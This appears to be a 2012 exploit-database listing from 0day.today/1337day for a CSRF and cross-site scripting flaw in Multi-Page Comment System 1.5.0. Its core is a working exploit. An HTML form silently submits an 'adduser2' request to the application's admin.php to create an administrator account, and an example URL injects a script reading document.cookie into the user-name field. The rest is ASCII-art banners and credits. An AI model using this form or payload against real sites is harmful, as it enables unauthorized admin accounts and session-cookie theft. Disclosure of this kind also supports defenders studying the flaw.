[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Multi-Page Comment System CSRF/XSS Vulnerability

Author
DaOne
Risk
[
Security Risk Low
]
0day-ID
0day-ID-19697
Category
web applications
Date add
06-11-2012
Platform
php
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm DaOne member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: Multi-Page Comment System CSRF/XSS Vulnerability
# Date: 2012-11-6
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://software.resplace.net/MPCS/
# Category: webapps/php
# Version: 1.5.0
##########################################

[#] Exploit:
<form action="./admin.php" method="GET">
<input type=hidden name="act" value="adduser2">
User Name:<br>
<input type=text name="name" class="name"><br><br>
Password:<br>
<input type=password name="password" class="name"><br><br>
Password Again:<br>
<input type=password name="password2" class="name">
<br><br>
<input type=submit value="Add User" class="button"></form>

-> http://localhost/MPCS_1_5/admin.php?act=adduser2&name=<script>alert(document.cookie)</script>&password=passw0rd&password2=passw0rd


----
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team.

#  0day.today [2024-11-16]  #